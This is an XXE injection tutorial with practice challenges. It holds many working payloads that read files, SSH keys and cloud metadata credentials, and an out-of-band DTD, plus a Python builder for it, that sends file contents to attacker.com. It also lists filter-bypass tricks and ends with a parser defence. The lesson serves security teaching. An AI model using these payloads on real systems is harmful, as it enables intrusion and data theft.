XML External Entity (XXE) Injection

Intermediate · 35 min · Writeup

Exploiting XML parsers to read files and perform SSRF

Learning Objectives

  • Understand XXE vulnerabilities
  • Identify XXE attack vectors
  • Exploit XXE for file disclosure
  • Perform blind XXE attacks

XML: The Trojan Horse of Data Formats

XML was supposed to be a universal data exchange format. What could possibly go wrong with a language that lets you define your own tags? Well, it turns out XML has a feature called "external entities" that was designed for convenience but became one of the most dangerous vulnerability classes in web security.

XXE (XML External Entity) injection allows attackers to interfere with how an application processes XML data. At its mildest, you can read files from the server. At its worst, you get full server-side request forgery, port scanning, and even remote code execution.

XXE is often combined with SSRF. If you understand SSRF, you already know half of XXE exploitation!

XML Basics for Hackers

Before we break XML, let's understand what makes it tick. XML has a feature called DTD (Document Type Definition) that defines the structure of the document and can declare entities, including external ones.

Basic XML Structure

xml
<?xml version="1.0" encoding="UTF-8"?>
<user>
  <name>John Doe</name>
  <email>john@example.com</email>
  <role>admin</role>
</user>

Internal Entities (Safe-ish)

xml
<?xml version="1.0"?>
<!DOCTYPE user [
  <!ENTITY company "MegaCorp Inc">
]>
<user>
  <name>John Doe</name>
  <employer>&company;</employer> <!-- Expands to "MegaCorp Inc" -->
</user>

<!-- Entities are like variables: define once, use many times -->
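
To see internal entity expansion in action, here is a minimal sketch using Python's standard-library xml.etree.ElementTree, which expands entities declared in the internal DTD subset. The document string is the example above without the trailing comments; the variable names are only illustrative.

```python
import xml.etree.ElementTree as ET

# The internal-entity example from above, as a Python string.
DOC = """<?xml version="1.0"?>
<!DOCTYPE user [
  <!ENTITY company "MegaCorp Inc">
]>
<user>
  <name>John Doe</name>
  <employer>&company;</employer>
</user>"""

root = ET.fromstring(DOC)

# The parser has already replaced &company; with the declared value.
employer = root.find("employer").text
print(employer)
```

The application code never sees `&company;`. It only sees the expanded text, which is why entity handling is invisible unless you test for it.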

External Entities (Dangerous!)

xml
<?xml version="1.0"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name> <!-- Server reads /etc/passwd into the name field! -->
</user>

<!-- The SYSTEM keyword tells the XML parser to fetch external content -->

The DTD (declared inside <!DOCTYPE ... [ ... ]>) is where XXE payloads live. If an application parses XML with external entity processing enabled, you can read files, make HTTP requests, and more.
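
Whether an external entity is resolved depends entirely on the parser and its configuration. As a contrast case, the sketch below feeds the payload to Python's standard-library xml.etree.ElementTree, which does not fetch external entities and reports the reference as an error instead. The helper name `try_parse` is hypothetical.

```python
import xml.etree.ElementTree as ET

PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
</user>"""

def try_parse(doc):
    """Return the text of <name>, or the parser error as a string."""
    try:
        return ET.fromstring(doc).find("name").text
    except ET.ParseError as exc:
        return f"ParseError: {exc}"

# ElementTree refuses to resolve the external entity, so this is an error string.
result = try_parse(PAYLOAD)
print(result)
```

A vulnerable parser would have returned the file contents in `<name>` instead. Other libraries and languages ship with different defaults, so each one has to be checked individually.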

Types of XXE Attacks

1. Classic XXE (File Disclosure)

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

<!-- Response shows file contents:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
-->

2. XXE to SSRF

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<data>&xxe;</data>

<!-- Access AWS metadata, internal services, etc. -->
<!-- Same techniques as SSRF! -->

3. Blind XXE (Out-of-Band)

When the XML response doesn't include your entity value, you need to exfiltrate data through out-of-band channels:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
  %eval;
  %exfil;
]>
<data>test</data>

<!-- Server reads /etc/passwd, then makes a request to attacker.com
     with the file contents in the URL parameter.
     Note: XML forbids a parameter-entity reference (%file;) inside another
     declaration in the internal subset, so in practice these declarations
     are served from an external DTD. -->
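
The exfiltration declarations follow a fixed pattern, so they can be generated for any target file and callback host. This is a minimal sketch: the function name `build_exfil_dtd` and its parameters are hypothetical, and it emits the declarations as standalone DTD text of the kind you would host on your own server. Multi-line files often break the resulting URL, so a single-line file such as /etc/hostname is a safer first target.

```python
def build_exfil_dtd(target_file: str, callback_url: str) -> str:
    """Return DTD text that reads target_file and sends it to callback_url.

    target_file  -- absolute path on the target, e.g. "/etc/hostname"
    callback_url -- attacker-controlled URL, ending in "/"
    """
    return (
        # 1. Load the file into the parameter entity %file;
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        # 2. Build a second declaration whose URL embeds %file;
        #    (&#x25; is an escaped "%" so the inner entity is declared later)
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{callback_url}?data=%file;'>\">\n"
        # 3. Expand %eval; to declare %exfil;, then trigger the request
        "%eval;\n"
        "%exfil;\n"
    )

dtd = build_exfil_dtd("/etc/hostname", "http://attacker.com/")
print(dtd)
```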

4. Error-Based XXE

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
  %eval;
  %error;
]>
<data>test</data>

<!-- Forces an error that includes the file contents in the error message:
     "File not found: /nonexistent/root:x:0:0:root:/root:/bin/bash..." -->

5. XInclude Attacks

When you can't control the DOCTYPE but can inject into XML content:

xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

<!-- XInclude is another way to include external content -->
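
To make the XInclude mechanism concrete, the sketch below uses Python's standard-library xml.etree.ElementInclude, which only resolves `xi:include` when the application calls it explicitly. A temporary file stands in for a sensitive file (an assumption for the demo), and its plain path is used as the `href` because the default loader opens local paths rather than file:// URLs.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

# Stand-in for a sensitive file; a real target would be e.g. /etc/passwd.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
    fh.write("secret-from-disk")
    secret_path = fh.name

# Attacker-controlled fragment: no DOCTYPE needed, only a namespace and an element.
doc = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    f'<xi:include parse="text" href="{secret_path}"/>'
    "</foo>"
)

root = ET.fromstring(doc)
ElementInclude.include(root)  # replaces xi:include with the file's text, in place
included = root.text
os.unlink(secret_path)
print(included)
```

The point of the demo is that the included text ends up inside the surrounding element, exactly where the attacker placed the `xi:include` tag.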

Finding XXE Vulnerabilities

XXE Hunting Process

1. Identify XML Entry Points
  • File uploads (DOCX, XLSX, SVG are XML-based!)
  • API endpoints accepting XML
  • SOAP web services
  • RSS/Atom feed parsers
  • Config file uploads

2. Test for Entity Processing
  • Submit XML with a harmless internal entity
  • If it expands, external entities might work too

xml
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY test "XXE_WORKS">]>
<data>&test;</data>

If the response contains "XXE_WORKS", entities are processed!

3. Test External Entity
  • Try file:// protocol to read local files
  • Try http:// to detect outbound connections

xml
<?xml version="1.0"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<data>&xxe;</data>

4. Try Blind XXE
  • If no direct output, use out-of-band detection
  • Host an external DTD on your server
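
Steps 2 and 3 of the hunting process can be sketched as small payload builders. All function names here are hypothetical, and the `<data>` root element is an assumption: in a real test it has to match whatever structure the endpoint expects. A random canary is used instead of a fixed string so a match in the response cannot be a coincidence.

```python
import uuid

def internal_entity_probe():
    """Step 2: build a harmless internal-entity probe with a unique canary."""
    canary = "XXE_" + uuid.uuid4().hex[:8]
    payload = (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE test [<!ENTITY test "{canary}">]>\n'
        "<data>&test;</data>"
    )
    return canary, payload

def external_entity_probe(target="file:///etc/hostname"):
    """Step 3: build an external-entity probe for a file:// or http:// target."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE test [\n"
        f'  <!ENTITY xxe SYSTEM "{target}">\n'
        "]>\n"
        "<data>&xxe;</data>"
    )

def canary_reflected(canary, response_body):
    """True if the response echoed the expanded entity value."""
    return canary in response_body

canary, probe = internal_entity_probe()
print(probe)
```

Send `probe` with any HTTP client, then pass the response body to `canary_reflected`. If it returns False even though the request succeeded, move on to the blind techniques in step 4.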

Hidden XML Entry Points

OBVIOUS:
- Content-Type: application/xml
- Content-Type: text/xml
- API endpoints ending in .xml

HIDDEN (XML inside other formats):
───────────────────────────────────
DOCX/XLSX/PPTX (Office Open XML):
- These are ZIP files containing XML!
- Unzip, modify XML, re-zip
- Upload the modified document

SVG (Scalable Vector Graphics):
- SVG is XML-based
- Image upload → SVG → XXE!

SOAP Web Services:
- SOAP uses XML envelopes
- Often poorly validated

PDF with XMP Metadata:
- PDFs can contain XML metadata
- Some parsers process external entities

RSS/Atom Feeds:
- Feed readers parse XML
- Inject XXE in your own feed

Try changing Content-Type from application/json to application/xml. Some APIs accept both formats but only secure one of them!
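
When trying the Content-Type switch, you need an XML body that mirrors the JSON one. The sketch below converts a flat JSON object into XML using only the standard library. The function name and the `root_tag` default are hypothetical, and the element names an API actually expects are a guess you may need to adjust.

```python
import json
import xml.etree.ElementTree as ET

def json_to_xml(json_body: str, root_tag: str = "root") -> str:
    """Convert a flat JSON object into an equivalent XML document string."""
    root = ET.Element(root_tag)
    for key, value in json.loads(json_body).items():
        child = ET.SubElement(root, key)  # one child element per JSON key
        child.text = str(value)
    return ET.tostring(root, encoding="unicode")

xml_body = json_to_xml(
    '{"name": "John", "email": "john@example.com"}', root_tag="user"
)
print(xml_body)
```

Resend the request with `Content-Type: application/xml` and this body. If the API responds as it did for JSON, prepend a DOCTYPE and continue with the entity tests.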

Exploitation Techniques

File Reading

xml
<!-- Each DOCTYPE below is a separate payload; reference the entity
     with <data>&xxe;</data> as in the first example -->

<!-- Linux sensitive files -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>

<!-- /etc/shadow is normally readable only if the parser runs as root -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///home/user/.ssh/id_rsa">]>

<!-- Windows sensitive files -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/inetpub/wwwroot/web.config">]>

<!-- Application source code -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">]>

<!-- PHP only: base64-encode the file so characters like < and & survive XML parsing -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">]>
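
Output retrieved through the php://filter base64 wrapper has to be decoded before it is readable. A minimal sketch, with a hypothetical helper name and a made-up sample standing in for a real response:

```python
import base64

def decode_filter_output(encoded: str) -> str:
    """Decode text returned through php://filter/convert.base64-encode."""
    cleaned = "".join(encoded.split())  # drop whitespace or line breaks added in transit
    return base64.b64decode(cleaned).decode("utf-8", errors="replace")

# Made-up sample: what the entity value might look like in a response.
sample = base64.b64encode(b"<?php $db_pass = 'example'; ?>").decode("ascii")
decoded = decode_filter_output(sample)
print(decoded)
```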

SSRF via XXE

xml
<!-- Cloud Metadata -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>

<!-- Internal Network Scanning -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://192.168.1.1:22/">
]>
<data>&xxe;</data>

<!-- Internal Services -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<data>&xxe;</data>

Blind XXE with External DTD

STEP 1: Host malicious DTD on your server (evil.dtd):
──────────────────────────────────────────────────────
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SERVER/?data=%file;'>">
%eval;
%exfil;

STEP 2: XXE payload that loads your DTD:
────────────────────────────────────────
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://YOUR-SERVER/evil.dtd">
  %xxe;
]>
<data>anything</data>

STEP 3: Check your server logs for the callback with file contents!

NOTE: Parameter entities (%) are used because only they can be referenced
inside the DTD itself. The declarations live in an external DTD because XML
does not allow a parameter-entity reference inside another declaration in
the internal subset.

SVG XXE

xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <text x="0" y="20">&xxe;</text>
</svg>

<!-- Upload this as profile picture, the file contents may appear in the image! -->

XLSX/DOCX XXE

bash
# XLSX/DOCX files are ZIP archives containing XML

# Step 1: Create a legitimate document

# Step 2: Unzip it
unzip document.xlsx -d extracted/

# Step 3: Find XML files to inject
find extracted/ -name '*.xml'
# e.g. xl/workbook.xml, xl/sharedStrings.xml, [Content_Types].xml

# Step 4: Inject XXE into one of the XML files
# Put the DOCTYPE directly after the XML declaration at the top of the file:
#   <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
#   <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

# Step 5: Add &xxe; somewhere in the XML content

# Step 6: Re-zip (subshell keeps the current directory unchanged)
(cd extracted && zip -r ../malicious.xlsx .)

# Step 7: Upload malicious.xlsx
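
Steps 2, 4, and 6 can also be done in one pass without touching the filesystem. This is a minimal sketch using Python's zipfile module. The function name `inject_doctype` is hypothetical, the demo archive is a one-file stand-in rather than a valid spreadsheet, and step 5 (placing `&xxe;` in the content) is still up to you.

```python
import io
import zipfile

DOCTYPE = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'

def inject_doctype(archive_bytes: bytes, member: str) -> bytes:
    """Copy an OOXML archive, inserting DOCTYPE after the XML declaration of `member`."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == member:
                text = data.decode("utf-8")
                # The DOCTYPE must follow the <?xml ...?> declaration, if there is one.
                decl_end = text.find("?>") + 2 if text.startswith("<?xml") else 0
                data = (text[:decl_end] + DOCTYPE + text[decl_end:]).encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()

# Demo with a stand-in archive containing a single XML part.
demo = io.BytesIO()
with zipfile.ZipFile(demo, "w") as z:
    z.writestr(
        "xl/sharedStrings.xml",
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><sst><si><t>hi</t></si></sst>',
    )

patched = inject_doctype(demo.getvalue(), "xl/sharedStrings.xml")
with zipfile.ZipFile(io.BytesIO(patched)) as z:
    patched_xml = z.read("xl/sharedStrings.xml").decode("utf-8")
print(patched_xml)
```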

Bypassing XXE Protections

Encoding Bypasses

xml
<!-- UTF-16 encoding -->
<?xml version="1.0" encoding="UTF-16"?>

<!-- Different file:// variations -->
file:///etc/passwd
file://localhost/etc/passwd
file://127.0.0.1/etc/passwd

<!-- PHP wrappers (if PHP parses the XML) -->
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/read=convert.base64-encode/resource=file:///etc/passwd

<!-- Expect wrapper (can execute commands; requires PHP's expect extension) -->
expect://whoami
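
The UTF-16 trick works against filters that search the raw request bytes for ASCII keywords such as `<!ENTITY`. The sketch below shows why: after re-encoding, the keyword's bytes are no longer contiguous. The payload and variable names are illustrative, and whether a given filter or parser behaves this way is something to verify per target.

```python
import codecs

payload = (
    '<?xml version="1.0" encoding="UTF-16"?>\n'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
    "<data>&xxe;</data>"
)

# Explicit little-endian bytes plus a BOM so the parser can detect the byte order.
encoded = codecs.BOM_UTF16_LE + payload.encode("utf-16-le")

# In an ASCII-compatible encoding the keyword is visible to a byte-level filter.
visible_in_utf8 = b"<!ENTITY" in payload.encode("utf-8")
# In UTF-16 every character is followed by a NUL byte, which splits the keyword.
visible_in_utf16 = b"<!ENTITY" in encoded

print(visible_in_utf8, visible_in_utf16)
```

Send `encoded` as the request body. An XML parser that honors the BOM or the encoding declaration still sees the original document.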

Protocol Alternatives

xml
<!-- If file:// is blocked -->

<!-- jar: protocol (Java) -->
jar:http://attacker.com/evil.jar!/file.txt

<!-- netdoc: protocol (Java) -->
netdoc:///etc/passwd

<!-- gopher: protocol -->
gopher://attacker.com:1234/_test

<!-- data: protocol -->
data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk

Parameter Entities When Regular Blocked

xml
<!-- Some parsers block regular entities but allow parameter entities -->
<!-- As with blind XXE, the nested %xxe; reference is generally accepted
     only when these declarations are loaded from an external DTD -->

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "file:///etc/passwd">
  <!ENTITY % wrapper "<!ENTITY result '%xxe;'>">
  %wrapper;
]>
<data>&result;</data>

Practice Challenges

Basic XXE

Challenge
🔥 medium

An API endpoint accepts XML:

POST /api/parse
Content-Type: application/xml

<user>
  <name>John</name>
  <email>john@example.com</email>
</user>

The response echoes back:

{"message": "User John (john@example.com) created"}

Read the file /flag.txt from the server.

Blind XXE Exfiltration

Challenge
🔥 medium

Same endpoint, but now it only returns:

{"status": "success"}

The server never reflects file contents in its response, but it still processes external entities. You control a server at http://attacker.com. Exfiltrate /etc/hostname from the target.

SVG Upload XXE

Challenge
🔥 medium

A website has a profile picture upload that accepts SVG files. The SVG is processed server-side and a PNG thumbnail is generated. When viewing thumbnails, you can see text rendered from the SVG. Exploit this to read /etc/passwd.

Knowledge Check

XXE Quiz

What does DTD stand for in XML?

Key Takeaways

  • XXE exploits XML's external entity feature to read files, make HTTP requests (SSRF), and more
  • DTD section is the attack surface - look for <!DOCTYPE and <!ENTITY declarations
  • Hidden XML formats: DOCX, XLSX, SVG, SOAP, RSS/Atom are all potential XXE vectors
  • Blind XXE uses parameter entities and external DTDs to exfiltrate data out-of-band
  • Defense: Disable DTD processing and external entities in your XML parser configuration
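
As one way to apply the last takeaway, the sketch below rejects any document that carries a DOCTYPE before handing it to the real parser. It uses only Python's standard library; `safe_fromstring` and `DoctypeForbidden` are hypothetical names. Treat it as an illustration of the idea rather than a vetted control, since other languages and libraries expose different switches for the same purpose.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

class DoctypeForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""

def safe_fromstring(xml_text: str) -> ET.Element:
    """Parse XML only if it contains no DOCTYPE (and therefore no custom entities)."""
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")

    # First pass: a bare expat parser whose only job is to spot a DOCTYPE.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = on_doctype
    checker.Parse(xml_text, True)  # the handler's exception propagates from here

    # Second pass: the document is DOCTYPE-free, so parse it normally.
    return ET.fromstring(xml_text)

clean = safe_fromstring("<user><name>John</name></user>")
print(clean.find("name").text)

try:
    safe_fromstring(
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>'
    )
    blocked = False
except DoctypeForbidden:
    blocked = True
print(blocked)
```

Rejecting the DOCTYPE outright is stricter than disabling external entities alone, and it also shuts out the internal-entity and parameter-entity tricks covered earlier.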
